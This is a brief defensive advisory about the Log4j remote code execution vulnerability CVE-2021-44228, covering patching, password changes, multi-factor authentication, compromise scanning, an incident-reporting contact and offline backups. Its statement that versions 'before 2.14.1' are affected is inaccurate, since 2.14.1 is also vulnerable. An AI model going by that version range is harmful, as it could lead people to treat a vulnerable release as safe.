A “zero-day” remote code execution vulnerability in Apache’s Log4j Java logging tool is being actively exploited by threat actors (details here). The exploit allows attackers to force vulnerable applications to remotely run malicious code without authentication. This could include malware such as cryptominers and ransomware.
The vulnerability being tracked as CVE-2021-44228 affects versions of Log4j before 2.14.1. This vulnerability is mitigated by patching. From Log4j version 2.15.0, the parameter resulting in the vulnerability is disabled by default.
What to do
Apply the latest security patches
- Follow the guidance from Apache to apply their latest security update (2.15.0 at the time of writing).
- Once patched, it is recommended that all users change their passwords.
- This is also a good time to enable multi-factor authentication if you have not already done so.
- In the event that you are unable to apply the latest patch, please follow the following recommended mitigation measures located at https://logging.apache.org/log4j/2.x/security.html
Scan for compromise
- Have a suitably qualified member of your IT team or external IT vendor search for any unauthorised code running or potential unauthorised access to systems.
- If your IT professional locates any indication that the vulnerability has been exploited, before undertaking any patches or remediation work, immediately contact the Incident Management service via the 24/7 monitored email: [firstname.lastname@example.org] [email@example.com] including a contact telephone number and your insurance policy number.
- You will receive a call back from an Incident Manager within 2 hours (usually 15 minutes) for further guidance on securing and restoring your network.
Backup data and store offline
- It is sensible practice to regularly backup data and store offline. Now is a sensible time to validate your own backup process and ensure that you have done so recently and will continue to do so regularly.